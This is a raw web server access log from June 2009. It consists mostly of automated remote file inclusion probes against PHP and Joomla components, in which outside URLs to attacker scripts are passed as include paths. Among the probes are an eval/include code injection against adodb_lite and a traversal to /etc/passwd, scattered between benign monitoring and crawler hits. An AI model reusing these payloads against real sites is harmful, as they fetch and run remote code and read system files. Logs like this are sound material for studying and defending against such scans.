85.17.162.28 - - [04/Jun/2009:01:40:15 -0400] "GET /logs/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:40:33 -0400] "GET /logs/access_log.Q109052200/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:40:38 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:40:38 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:40:41 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:40:57 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:40:57 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:40:57 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:01:41:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.144.136.88 - - [04/Jun/2009:01:41:21 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:41:42 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:42:07 -0400] "GET /logs/access_log.Q109051100%20%20/include/lib.inc.php?site_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.92.50 - - [04/Jun/2009:01:45:13 -0400] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../etc/passwd HTTP/1.0" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:01:45:13 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
218.185.20.88 - - [04/Jun/2009:01:45:37 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:01:45:43 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:01:45:43 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:01:45:43 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:45:58 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:01:46:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [04/Jun/2009:01:46:25 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:25 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:26 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:26 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:26 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:26 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:27 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:28 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:28 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:28 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:28 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:46:37 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:47:20 -0400] "GET //include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:47:20 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:47:20 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:47:45 -0400] "GET /logs/access_log.Q109052200//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:47:48 -0400] "GET /logs/access_log.Q109052200//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:47:49 -0400] "GET /logs/access_log.Q109052200//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:47:54 -0400] "GET /logs/access_log.Q109052200//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:01:48:02 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:01:48:02 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:11 -0400] "GET //include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:11 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:11 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:15 -0400] "GET //include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:15 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:15 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:15 -0400] "GET //include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:15 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:48:15 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:48:16 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:48:16 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:48:16 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:50:24 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:50:27 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:50:30 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.189.18.73 - - [04/Jun/2009:01:50:31 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:01:51:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.234.200.238 - - [04/Jun/2009:01:51:35 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.234.200.238 - - [04/Jun/2009:01:51:35 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:01:52:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0017A6441CB21800ABBE002+M37+ENG HTTP/1.1" 200 40515 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A4441C023000724E05C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:01:52:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057AC4604129700C6EE00P+M37+ENG HTTP/1.1" 200 40079 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A6441CB21800ABBE002+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
78.111.80.18 - - [04/Jun/2009:01:53:27 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:01:53:27 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:01:53:27 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:01:53:37 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:53:38 -0400] "GET /logs/access_log.Q109053100//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:53:38 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:53:38 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:53:49 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:53:49 -0400] "GET /logs/access_log.Q109053100//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:53:49 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.196.124.252 - - [04/Jun/2009:01:54:22 -0400] "GET /index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:54:22 -0400] "GET /logs/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:54:22 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:01:54:36 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:36 -0400] "GET //login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:36 -0400] "GET /logs//login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:40 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:40 -0400] "GET //login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:40 -0400] "GET /logs//login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:46 -0400] "GET /logs/access_log.Q109051100//login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:54:49 -0400] "GET /logs/access_log.Q109051100//login.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
81.196.124.252 - - [04/Jun/2009:01:54:56 -0400] "GET /logs/access_log.Q108062200%20%20/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:54:59 -0400] "GET /logs/error_log.Q109051900//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:55:01 -0400] "GET /logs/error_log.Q109051900//components/com_securityimages/lang.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
122.153.212.195 - - [04/Jun/2009:01:55:21 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:55:21 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:55:21 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:55:22 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?redir=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:01:56:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.234.200.238 - - [04/Jun/2009:01:56:06 -0400] "GET /logs/access_log.Q109050300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:56:11 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:01:56:15 -0400] "GET /?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:56:15 -0400] "GET /logs/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 4098 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:56:15 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.234.200.238 - - [04/Jun/2009:01:56:23 -0400] "GET /logs/access_log.Q109052400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:01:56:31 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:56:32 -0400] "GET /?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:56:32 -0400] "GET /logs/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 4098 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:56:33 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:01:56:37 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
211.144.136.88 - - [04/Jun/2009:01:56:47 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:56:47 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:56:47 -0400] "GET /logs/access_log.Q109052100%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:56:47 -0400] "GET /logs/access_log.Q109052300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:01:56:59 -0400] "GET /logs/error_log.Q109011700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
85.17.162.28 - - [04/Jun/2009:01:57:00 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:57:02 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:01:57:03 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:57:16 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:57:16 -0400] "GET /logs/access_log.Q109052300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:57:19 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.144.136.88 - - [04/Jun/2009:01:57:19 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.67.54 - - [04/Jun/2009:01:57:26 -0400] "GET /images/lcalen.htm HTTP/1.1" 200 7943 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.149.85.37 - - [04/Jun/2009:01:57:45 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:01:57:45 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:01:57:52 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
